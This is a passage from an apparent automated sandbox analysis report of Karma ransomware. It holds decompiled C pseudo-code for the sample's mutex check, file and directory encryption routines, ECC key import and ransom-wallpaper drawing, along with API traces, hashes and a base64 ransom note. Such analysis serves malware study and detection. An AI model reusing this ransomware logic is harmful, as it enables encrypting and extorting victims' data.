iB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g", _t76, 1, _t65,  &_v8, 0, 0);
				_t58 =  *0x406008;
				 *((char*)(_t58 + _v8)) = 0;
				return _t58;
			}




































0x00401e0e
0x00401e12
0x00401e15
0x00401e15
0x00401e19
0x00401e1c
0x00401e1f
0x00401e24
0x00401e2a
0x00401e30
0x00401e30
0x00401e33
0x00401e36
0x00401e3b
0x00401e40
0x00401e40
0x00401e43
0x00401e46
0x00401e49
0x00401e49
0x00401e4c
0x00401e51
0x00401e5a
0x00401e60
0x00401e60
0x00401e61
0x00401e60
0x00401e84
0x00401e8a
0x00401e95
0x00401e9e
0x00401ea5
0x00401ea7
0x00401ea7
0x00401eac
0x00401eba
0x00401ec4
0x00401ec6
0x00401ec6
0x00401ecc
0x00401ece
0x00401ed5
0x00401ed7
0x00401ee0
0x00401ee0
0x00401ee1
0x00401ee0
0x00401efe
0x00401f0c
0x00401f12
0x00401f18
0x00401f1a
0x00401f22
0x00401f2b
0x00401f2d
0x00401f2d
0x00401f33
0x00401f3a
0x00401f42
0x00401f44
0x00401f44
0x00401f49
0x00401f4b
0x00401f52
0x00401f54
0x00401f54
0x00401f55
0x00401f54
0x00401f71
0x00401f73
0x00401f7a
0x00401f81
0x00401f83
0x00401f83
0x00401f88
0x00401f90
0x00401f9a
0x00401f9c
0x00401f9c
0x00401fa2
0x00401fa4
0x00401fab
0x00401fb0
0x00401fb0
0x00401fb1
0x00401fb0
0x00401fce
0x00401fde
0x00401fe4
0x00401fea
0x00401fec
0x00401ff4
0x00401ffd
0x00401fff
0x00401fff
0x00402005
0x0040200c
0x00402014
0x00402016
0x00402016
0x0040201b
0x0040201d
0x00402024
0x00402026
0x00402030
0x00402030
0x00402031
0x00402030
0x0040204d
0x00402052
0x0040205a
0x00402061

APIs
  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000,?,00000000), ref: 00401E7D
  • WriteConsoleW.KERNELBASE(00000000,?,00000000), ref: 00401E84
  • LoadLibraryA.KERNELBASE(crypt32.dll,?,00000000), ref: 00401EA5
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401EC2
  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00401F05
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 00401F0C
  • LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401F29
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401F42
  • LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401F81
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401F98
  • GetProcessHeap.KERNEL32(00000000,00000001,?,00000000), ref: 00401FD7
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 00401FDE
  • LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401FFB
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00402014
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: AddressHeapLibraryLoadProc$AllocProcess$ConsoleHandleWrite
  • String ID: 38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==$CryptStringToBinaryW$WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdm$[+] Trying to import ECC public key...$crypt32.dll$hC@
  • API String ID: 238319377-622750579
  • Opcode ID: 2180c5b2d04714ec5efb67d5ea94fba3e0a293ac2c853ad166c9bb5c839e750b
  • Instruction ID: 9e063415e7eda99132234e8214f4e216244cd9a1266f3e5cb94004aefb5f967e
  • Opcode Fuzzy Hash: 2180c5b2d04714ec5efb67d5ea94fba3e0a293ac2c853ad166c9bb5c839e750b
  • Instruction Fuzzy Hash: 9861B5B4650304AEDB24EFA4DD45B6777B8EB84700F11817EEA06F72E0EBB459508B98
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule

Control-flow Graph

C-Code - Quality: 100%
			_entry_() {
				char _v8;
				void _v528;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				long _t32;
				long _t37;
				signed int* _t56;
				signed short* _t57;
				signed int* _t58;
				void* _t71;
				char* _t72;
				void* _t83;
				void* _t84;

				_t56 =  &_v528 - 2;
				_t28 = (L"[+] Checking if already started..." -  &_v528 >> 1) + 1;
				_t71 = (L"[+] Checking if already started..." -  &_v528 >> 1) + 1 + _t28;
				do {
					_t29 =  *(_t71 + _t56) & 0x0000ffff;
					_t56 =  &(_t56[0]);
					 *_t56 = _t29;
				} while (_t29 != 0);
				_t57 =  &_v528;
				_t72 = "\n";
				do {
					_t30 =  *_t57 & 0x0000ffff;
					_t57 =  &(_t57[1]);
				} while (_t30 != 0);
				_t58 = _t57 - 4;
				do {
					_t31 =  *_t72 & 0x0000ffff;
					_t58 =  &(_t58[0]);
					 *_t58 = _t31;
					_t8 =  &(_t72[2]); // 0x414b0000
					_t72 = _t8;
				} while (_t31 != 0);
				_t32 = 0;
				if(_v528 == 0) {
					L9:
					WriteConsoleW(GetStdHandle(0xfffffff5),  &_v528, _t32, 0, 0); // executed
					CreateMutexA(0, 0, "KARMA"); // executed
					_t37 = GetLastError();
					if(_t37 == 0xb7) {
						return _t37;
					}
					 *0x406000 = E00402280();
					E004021B0(L"[+] Getting argument list...", 0); // executed
					_t83 = E00402070(GetCommandLineW(),  &_v8);
					if(_v8 <= 1) {
						E00401DF0(); // executed
						E004021B0(L"[+] Starting all threads...", 0); // executed
						E004035D0(); // executed
					} else {
						E004021B0(L"   [-] Argument: ",  *((intOrPtr*)(_t83 + 4)));
						if(E00401D60( *((intOrPtr*)(_t83 + 4))) == 0) {
							E00401DF0();
							E004021B0(L"[+] Encrypting file: ",  *((intOrPtr*)(_t83 + 4)));
							E00402760( *((intOrPtr*)(_t83 + 4)));
						} else {
							E00401DF0();
							E00401D10( &_v528,  *((intOrPtr*)(_t83 + 4)));
							E00401D30( &_v528, "\\");
							E004021B0(L"[+] Encrypting directory: ",  &_v528);
							E00402D30( &_v528);
						}
					}
					_t37 = E00402320();
					ExitProcess(0);
				}
				do {
					_t32 = _t32 + 1;
				} while ( *((short*)(_t84 + _t32 * 2 - 0x20c)) != 0);
				goto L9;
			}

















0x00401b8e
0x00401b91
0x00401b93
0x00401b96
0x00401b96
0x00401b9a
0x00401b9d
0x00401ba0
0x00401ba5
0x00401bab
0x00401bb0
0x00401bb0
0x00401bb3
0x00401bb6
0x00401bbb
0x00401bc0
0x00401bc0
0x00401bc3
0x00401bc6
0x00401bc9
0x00401bc9
0x00401bcc
0x00401bd1
0x00401bda
0x00401bec
0x00401c01
0x00401c10
0x00401c16
0x00401c21
0x00401cf1
0x00401cf1
0x00401c2e
0x00401c38
0x00401c51
0x00401c53
0x00401cca
0x00401cd6
0x00401cdb
0x00401c55
0x00401c5d
0x00401c6c
0x00401cae
0x00401cbb
0x00401cc3
0x00401c6e
0x00401c6e
0x00401c7c
0x00401c8c
0x00401c9c
0x00401ca7
0x00401ca7
0x00401c6c
0x00401ce0
0x00401ce7
0x00401ce7
0x00401be0
0x00401be0
0x00401be1
0x00000000

APIs
  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000), ref: 00401BFA
  • WriteConsoleW.KERNELBASE(00000000), ref: 00401C01
  • CreateMutexA.KERNELBASE(00000000,00000000,KARMA), ref: 00401C10
  • GetLastError.KERNEL32 ref: 00401C16
  • GetCommandLineW.KERNEL32 ref: 00401C3D
  • ExitProcess.KERNEL32 ref: 00401CE7
    • Part of subcall function 00401DF0: GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000,?,00000000), ref: 00401E7D
    • Part of subcall function 00401DF0: WriteConsoleW.KERNELBASE(00000000,?,00000000), ref: 00401E84
    • Part of subcall function 00401DF0: LoadLibraryA.KERNELBASE(crypt32.dll,?,00000000), ref: 00401EA5
    • Part of subcall function 00401DF0: GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401EC2
    • Part of subcall function 00401DF0: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00401F05
    • Part of subcall function 00401DF0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 00401F0C
    • Part of subcall function 00401DF0: LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401F29
    • Part of subcall function 004021B0: GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000), ref: 0040226A
    • Part of subcall function 004021B0: WriteConsoleW.KERNELBASE(00000000), ref: 00402271
    • Part of subcall function 00402760: CreateFileW.KERNELBASE(?,C0000000), ref: 0040278D
    • Part of subcall function 00402760: GetFileSizeEx.KERNEL32(00000000,00000003), ref: 004027A7
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004027D0
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 004027D9
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000008), ref: 004027E3
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 004027E6
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027F0
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 004027F3
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027FD
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 00402800
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000020), ref: 0040280C
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 0040280F
    • Part of subcall function 00402760: LoadLibraryW.KERNELBASE(bcrypt.dll), ref: 0040282A
    • Part of subcall function 00402760: GetProcAddress.KERNEL32(?,BCryptGenRandom), ref: 00402847
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: Heap$Process$Alloc$ConsoleHandleLibraryLoadWrite$AddressCreateFileProc$CommandErrorExitLastLineMutexSize
  • String ID: [-] Argument: $(B@$KARMA$[+] Checking if already started...$[+] Encrypting directory: $[+] Encrypting file: $[+] Getting argument list...$[+] Starting all threads...$hC@
  • API String ID: 3945073371-3735026340
  • Opcode ID: 01816b0811a6cb24de3ab987ac90751fb743111bb3ef22becbe281bafd49813a
  • Instruction ID: bfc79cb6b1bf02a545a08266bbec62af52f98c871f437353d0285555aeb6d5ed
  • Opcode Fuzzy Hash: 01816b0811a6cb24de3ab987ac90751fb743111bb3ef22becbe281bafd49813a
  • Instruction Fuzzy Hash: 8341B6706002048BC714BBB5C94976A7375EF84344F10C6BFFA16B72E2DB78AD418B59
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 323 4021b0-4021ce 324 4021d0-4021dd 323->324 324->324 325 4021df-4021e2 324->325 326 402211-40221c 325->326 327 4021e4-4021ea 325->327 329 402220-402229 326->329 328 4021f0-4021f9 327->328 328->328 330 4021fb-4021ff 328->330 329->329 331 40222b-40222e 329->331 332 402200-40220f 330->332 333 402230-40223f 331->333 332->326 332->332 333->333 334 402241-40224a 333->334 335 40225c-40227a GetStdHandle WriteConsoleW 334->335 336 40224c 334->336 337 402250-40225a 336->337 337->335 337->337
C-Code - Quality: 96%
			E004021B0(void* __ecx, signed short* __edx) {
				void _v524;
				signed int _t17;
				signed short* _t18;
				signed int* _t19;
				long _t20;
				int _t23;
				signed int _t24;
				signed int _t25;
				void* _t30;
				signed int _t31;
				signed int _t32;
				signed short* _t33;
				signed int* _t34;
				signed short* _t35;
				char* _t36;
				signed int* _t39;
				void* _t41;

				_t35 = __edx;
				_t39 =  &_v524 - 2;
				_t30 = (__ecx -  &_v524 >> 1) + 1 + (__ecx -  &_v524 >> 1) + 1;
				do {
					_t17 =  *(_t30 + _t39) & 0x0000ffff;
					_t39 =  &(_t39[0]);
					 *_t39 = _t17;
				} while (_t17 != 0);
				if(__edx != 0) {
					_t33 =  &_v524;
					asm("o16 nop [eax+eax]");
					do {
						_t24 =  *_t33 & 0x0000ffff;
						_t33 =  &(_t33[1]);
					} while (_t24 != 0);
					_t34 = _t33 - 4;
					do {
						_t25 =  *_t35 & 0x0000ffff;
						_t34 =  &(_t34[0]);
						 *_t34 = _t25;
						_t35 =  &(_t35[1]);
					} while (_t25 != 0);
				}
				_t18 =  &_v524;
				_t36 = "\n";
				do {
					_t31 =  *_t18 & 0x0000ffff;
					_t18 =  &(_t18[1]);
				} while (_t31 != 0);
				_t19 = _t18 - 4;
				do {
					_t32 =  *_t36 & 0x0000ffff;
					_t19 =  &(_t19[0]);
					 *_t19 = _t32;
					_t10 =  &(_t36[2]); // 0x414b0000
					_t36 = _t10;
				} while (_t32 != 0);
				_t20 = 0;
				if(_v524 != 0) {
					do {
						_t20 = _t20 + 1;
					} while ( *((short*)(_t41 + _t20 * 2 - 0x208)) != 0);
				}
				_t23 = WriteConsoleW(GetStdHandle(0xfffffff5),  &_v524, _t20, 0, 0); // executed
				return _t23;
			}




















0x004021b0
0x004021cb
0x004021ce
0x004021d0
0x004021d0
0x004021d4
0x004021d7
0x004021da
0x004021e2
0x004021e4
0x004021ea
0x004021f0
0x004021f0
0x004021f3
0x004021f6
0x004021fb
0x00402200
0x00402200
0x00402203
0x00402206
0x00402209
0x0040220c
0x00402200
0x00402211
0x00402217
0x00402220
0x00402220
0x00402223
0x00402226
0x0040222b
0x00402230
0x00402230
0x00402233
0x00402236
0x00402239
0x00402239
0x0040223c
0x00402241
0x0040224a
0x00402250
0x00402250
0x00402251
0x00402250
0x00402271
0x0040227a

APIs
  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000), ref: 0040226A
  • WriteConsoleW.KERNELBASE(00000000), ref: 00402271
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: ConsoleHandleWrite
  • String ID: hC@
  • API String ID: 2389571490-336404188
  • Opcode ID: 4a04f29e1ff0a26ba3bd12c14a1590599b0b93a548b6a486ac76467ac11fc1d3
  • Instruction ID: 26736e671d14f07e881d139068675f2870b8e4ac510383da8d16ca214fc7205d
  • Opcode Fuzzy Hash: 4a04f29e1ff0a26ba3bd12c14a1590599b0b93a548b6a486ac76467ac11fc1d3
  • Instruction Fuzzy Hash: 7E21D1358002168ACB24AFA4C949BB3B374FF45304F1582EEED96B71D1FB74AA85C758
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Download Yara Rule

Control-flow Graph

C-Code - Quality: 92%
			E00402320() {
				short _v532;
				WCHAR* _v620;
				struct tagSIZE _v668;
				signed int _v684;
				struct tagRECT _v720;
				short _v732;
				intOrPtr _v734;
				intOrPtr _v738;
				int _v742;
				void _v744;
				struct HFONT__* _v752;
				void* _v756;
				void* _v760;
				struct HDC__* _v772;
				int _v784;
				int _v788;
				int _v792;
				struct HDC__* _v796;
				int _v800;
				int _v804;
				struct HDC__* _v808;
				int _v812;
				void _v816;
				long _v820;
				struct HDC__* _v824;
				struct HDC__* _v828;
				struct HDC__* _v832;
				struct HDC__* _v836;
				struct HDC__* _v840;
				int _v844;
				int _v848;
				int _v852;
				long _v872;
				intOrPtr _v884;
				struct HDC__* _v888;
				void _v892;
				intOrPtr _v896;
				struct HDC__* _v900;
				void* _v904;
				long _v908;
				struct HDC__* _v916;
				struct HDC__* _v928;
				intOrPtr _v944;
				struct HDC__* _v948;
				int _v960;
				struct HDC__* _v964;
				intOrPtr _v976;
				int _v992;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				struct HDC__* _t100;
				void* _t110;
				int _t116;
				signed int _t120;
				struct HDC__* _t121;
				int _t129;
				signed short* _t159;
				signed int* _t160;
				void* _t165;
				int _t166;
				struct HDC__* _t168;
				int _t169;
				signed short* _t170;
				signed int* _t171;
				intOrPtr _t172;
				WCHAR* _t174;
				struct HDC__* _t175;
				void* _t176;
				int _t178;
				struct HDC__* _t180;
				int _t182;
				struct HDC__* _t185;
				struct HDC__* _t186;
				int _t190;

				GetTempPathW(0x104,  &_v532);
				_t159 =  &_v532;
				_t170 = L"background.jpg";
				do {
					_t94 =  *_t159 & 0x0000ffff;
					_t159 =  &(_t159[1]);
				} while (_t94 != 0);
				_t160 = _t159 - 4;
				do {
					_t95 =  *_t170 & 0x0000ffff;
					_t160 =  &(_t160[0]);
					 *_t160 = _t95;
					_t170 =  &(_t170[1]);
				} while (_t95 != 0);
				_t174 = HeapAlloc(GetProcessHeap(), 8, 0x800);
				_v620 = _t174;
				_t6 = _t174 - 2; // -2
				_t171 = _t6;
				_t165 = (L"\n\nPLEASE, READ KARMA-ENCRYPTED" - _t174 >> 1) + 1 + (L"\n\nPLEASE, READ KARMA-ENCRYPTED" - _t174 >> 1) + 1;
				asm("o16 nop [eax+eax]");
				do {
					_t98 =  *(_t165 + _t171) & 0x0000ffff;
					_t171 =  &(_t171[0]);
					 *_t171 = _t98;
				} while (_t98 != 0);
				_v752 = CreateFontW(0x2d, 0, 0, 0, 0x190, 0, 0, 0, 1, 2, 0, 0, 0, L"Leelawadee");
				_t100 = GetDC(0);
				_v756 = _t100;
				_t180 = CreateCompatibleDC(_t100);
				_v772 = _t180;
				SelectObject(_t180, _v756);
				_t166 = 0;
				if( *_t174 != 0) {
					do {
						_t166 = _t166 + 1;
					} while (_t174[_t166] != 0);
				}
				GetTextExtentPoint32W(_t180, _t174, _t166,  &_v668);
				_v684 = _v684 + 0x00000003 & 0xfffffffc;
				_v800 = GetSystemMetrics(0);
				_t182 = GetSystemMetrics(1);
				_t110 = CreateCompatibleBitmap(_v796, _v800, _t182);
				_v720.left = _t110;
				SelectObject(_v808, _t110);
				SetTextColor(_v816, 0xffffff);
				SetBkMode(_v824, 2);
				SetBkColor(_v832, 0);
				_v720.right = _v844;
				_t116 = 0;
				_v720.top = 0;
				_v720.left = 0;
				_v720.bottom.bmiHeader = _t182;
				if( *_t174 != 0) {
					do {
						_t116 = _t116 + 1;
					} while (_t174[_t116] != 0);
				}
				DrawTextW(_v840, _t174, _t116,  &_v720, 0x211);
				_v812 = _t182;
				_v744 = 0x4d42;
				_v738 = 0;
				_t120 = _v844;
				_v820 = 0x28;
				_v816 = _t120;
				_v808 = 0x100001;
				asm("movups xmm0, [esp+0x24]");
				_v804 = 0;
				_v800 = _t182 * _t120 + _t182 * _t120;
				asm("movups [esp+0x98], xmm0");
				_v796 = 0;
				_v792 = 0;
				asm("movups xmm0, [esp+0x34]");
				_v788 = 0;
				_v784 = 0;
				asm("movups [esp+0xa8], xmm0");
				_v742 = 0;
				asm("movq xmm0, [esp+0x44]");
				_v734 = 0x36;
				asm("movq [esp+0xb8], xmm0");
				_t121 = CreateCompatibleDC(_v828);
				_t185 = _v844;
				_t175 = _t121;
				_v836 = _t175;
				SelectObject(_t175, CreateDIBSection(_t185,  &(_v720.bottom), 0,  &_v760, 0, 0));
				BitBlt(_t175, 0, 0, _v852, _v848, _t185, 0, 0, 0xcc0020);
				_t186 = _v888;
				if(_t186 > 0) {
					_t172 = _v884;
					_t168 = 0xfffffffd;
					_v916 = 0xfffffffd;
					do {
						if(_t172 > 0) {
							_t190 = 3;
							do {
								_t60 = _t190 - 3; // 0x0
								_t169 = _t168 + 3;
								_v832 = _t169;
								if(GetPixel(_t175, _t169, _t60) == 0) {
									_t62 = _t190 - 3; // 0x0
									SetPixel(_t175, _v844, _t62, 0xc3c3c3);
									SetPixel(_t175, _v944 + 6, _t190, 0xc3c3c3);
									_t65 = _t190 - 6; // -3
									_t178 = _t65;
									SetPixel(_v948, _v960, _t178, 0xc3c3c3);
									_t175 = _v964;
									SetPixel(_t175, _v976 + 6, _t178, 0xc3c3c3);
									SetPixel(_t175, _v992, _t190, 0xc3c3c3);
								}
								_t172 = _v896;
								_t190 = _t190 + 0xc;
								_t168 = _v928;
								_t73 = _t190 - 3; // -12
							} while (_t73 < _t172);
							_t186 = _v900;
						}
						_t168 = _t168 + 0xc;
						_v916 = _t168;
						_t76 =  &(_t168->i); // 0xfffffff4
					} while (_t76 < _t186);
				}
				ReleaseDC(0, _v900);
				_t129 = CreateFileW( &_v732, 0x40000000, 0, 0, 4, 0x80, 0);
				_t176 = _t129;
				if(_t176 != 0xffffffff) {
					_v908 = 0;
					WriteFile(_t176,  &_v816, 0xe,  &_v908, 0);
					WriteFile(_t176,  &_v892, 0x28,  &_v908, 0);
					WriteFile(_t176, _v828, _v872,  &_v908, 0);
					CloseHandle(_t176);
					DeleteObject(_v824);
					DeleteDC(_v916);
					DeleteObject(_v904);
					HeapFree(GetProcessHeap(), 0, _v832);
					_t129 = SystemParametersInfoW(0x14, 0,  &_v744, 1);
				}
				return _t129;
			}














































































0x0040233b
0x00402341
0x00402348
0x00402350
0x00402350
0x00402353
0x00402356
0x0040235b
0x00402360
0x00402360
0x00402363
0x00402366
0x00402369
0x0040236c
0x00402385
0x0040238e
0x00402395
0x00402395
0x00402398
0x0040239a
0x004023a0
0x004023a0
0x004023a4
0x004023a7
0x004023aa
0x004023d9
0x004023dd
0x004023e4
0x004023f2
0x004023f5
0x004023f9
0x004023ff
0x00402404
0x00402406
0x00402406
0x00402407
0x00402406
0x00402416
0x0040242e
0x00402439
0x0040243f
0x0040244a
0x00402455
0x00402459
0x00402468
0x00402474
0x00402480
0x0040248a
0x00402491
0x00402493
0x0040249e
0x004024a9
0x004024b3
0x004024b5
0x004024b5
0x004024b6
0x004024b5
0x004024d0
0x004024df
0x004024e3
0x004024ea
0x004024ee
0x004024f5
0x004024fd
0x00402501
0x00402509
0x00402510
0x00402518
0x0040251c
0x00402524
0x0040252c
0x00402534
0x00402539
0x00402541
0x00402549
0x00402551
0x00402559
0x0040255f
0x00402567
0x00402570
0x00402576
0x0040257a
0x00402584
0x0040259c
0x004025b9
0x004025bf
0x004025c5
0x004025cb
0x004025cf
0x004025d4
0x004025d8
0x004025da
0x004025e0
0x004025e5
0x004025e5
0x004025e8
0x004025ee
0x004025fa
0x00402601
0x0040260a
0x0040261f
0x0040262a
0x0040262a
0x00402636
0x00402646
0x0040264f
0x00402660
0x00402660
0x00402666
0x0040266a
0x0040266d
0x00402671
0x00402674
0x0040267c
0x0040267c
0x00402680
0x00402683
0x00402687
0x0040268a
0x004025d8
0x00402698
0x004026b8
0x004026be
0x004026c3
0x004026dc
0x004026e6
0x004026f7
0x00402709
0x0040270c
0x0040271c
0x00402722
0x0040272c
0x0040273b
0x0040274f
0x0040274f
0x0040275a

APIs
  • GetTempPathW.KERNEL32(00000104,?,?,00000000), ref: 0040233B
  • GetProcessHeap.KERNEL32(00000008,00000800,?,00000000), ref: 00402378
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040237F
  • CreateFontW.GDI32(0000002D,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000002,00000000,00000000,00000000,Leelawadee,?,00000000), ref: 004023D1
  • GetDC.USER32(00000000), ref: 004023DD
  • CreateCompatibleDC.GDI32(00000000), ref: 004023E8
  • SelectObject.GDI32(00000000,?), ref: 004023F9
  • GetTextExtentPoint32W.GDI32(00000000,00000000,00000000,?), ref: 00402416
  • GetSystemMetrics.USER32 ref: 00402435
  • GetSystemMetrics.USER32 ref: 0040243D
  • CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040244A
  • SelectObject.GDI32(?,00000000), ref: 00402459
  • SetTextColor.GDI32(?,00FFFFFF), ref: 00402468
  • SetBkMode.GDI32(?,00000002), ref: 00402474
  • SetBkColor.GDI32(?,00000000), ref: 00402480
  • DrawTextW.USER32(?,00000000,00000000,00000000,00000211), ref: 004024D0
  • CreateCompatibleDC.GDI32(?), ref: 00402570
  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00402594
  • SelectObject.GDI32(00000000,00000000), ref: 0040259C
  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004025B9
  • GetPixel.GDI32(00000000,FFFFFFFA,00000000), ref: 004025F2
  • SetPixel.GDI32(00000000,?,00000000,00C3C3C3), ref: 0040260A
  • SetPixel.GDI32(00000000,?,00000003,00C3C3C3), ref: 0040261F
  • SetPixel.GDI32(?,?,-00000003,00C3C3C3), ref: 00402636
  • SetPixel.GDI32(?,?,-00000003,00C3C3C3), ref: 0040264F
  • SetPixel.GDI32(?,?,00000003,00C3C3C3), ref: 00402660
  • ReleaseDC.USER32 ref: 00402698
  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 004026B8
  • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 004026E6
  • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 004026F7
  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402709
  • CloseHandle.KERNEL32(00000000), ref: 0040270C
  • DeleteObject.GDI32(?), ref: 0040271C
  • DeleteDC.GDI32(?), ref: 00402722
  • DeleteObject.GDI32(00000000), ref: 0040272C
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402734
  • HeapFree.KERNEL32(00000000), ref: 0040273B
  • SystemParametersInfoW.USER32 ref: 0040274F
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: CreatePixel$Object$FileHeap$CompatibleDeleteSelectSystemTextWrite$ColorMetricsProcess$AllocBitmapCloseDrawExtentFontFreeHandleInfoModeParametersPathPoint32ReleaseSectionTemp
  • String ID: PLEASE, READ KARMA-ENCRYPTED$($6$Leelawadee$background.jpg
  • API String ID: 3363958648-3336038800
  • Opcode ID: 1d194a35e65f405323fdeca169d2d71cef0578acbaf7fb9668695732de5b653b
  • Instruction ID: ee4b26a5c427de9d116df7c20ce1b3aa9ba1370223ff4adb59bd260217b64008
  • Opcode Fuzzy Hash: 1d194a35e65f405323fdeca169d2d71cef0578acbaf7fb9668695732de5b653b
  • Instruction Fuzzy Hash: 8AC13A71548301AFE7209F60DD49B6BBBE8FF88714F10892DF784B62E0D7B499448B5A
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 445 4015a0-4015b2 446 4015b4-4015bb 445->446 447 4015d9-4015db 446->447 448 4015bd-4015c1 446->448 449 4015e0-4015e4 447->449 448->446 450 4015c3 448->450 451 401660-40166e 449->451 452 4015e6-4015ea 449->452 450->447 453 4015c5 450->453 456 401671-401676 451->456 452->449 455 4015ec 452->455 454 4015c7-4015cb 453->454 454->447 457 4015cd-4015d1 454->457 455->451 458 4015ee 455->458 459 401729-40173d 456->459 460 40167c-40168c 456->460 457->454 461 4015d3 457->461 463 4015f0-4015f4 458->463 462 401740-401758 459->462 460->456 464 40168e-401692 460->464 461->447 466 4018b6-4018bb 461->466 462->462 467 40175a-40176d 462->467 463->451 468 4015f6-4015fa 463->468 465 401694-401699 464->465 469 4016b4-401728 465->469 470 40169b-4016a2 465->470 471 401770-401788 467->471 468->463 472 4015fc 468->472 470->465 473 4016a4-4016b3 call 401480 470->473 471->471 474 40178a-4017b9 call 401240 call 4010f0 * 2 471->474 472->451 475 4015fe-40165f 472->475 484 4017c0-4017d9 474->484 484->484 485 4017db-4017dd 484->485 486 4017e0-4017fc 485->486 486->486 487 4017fe-40180e 486->487 488 401813-40182a 487->488 488->488 489 40182c-40183f call 4010f0 488->489 492 401840-401859 489->492 492->492 493 40185b-40186f 492->493 494 401870-401887 493->494 494->494 495 401889-4018b5 494->495 495->466
C-Code - Quality: 79%
			E004015A0(signed int* __ecx, signed int* __edx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v76;
				char _v108;
				char _v140;
				signed int* _t96;
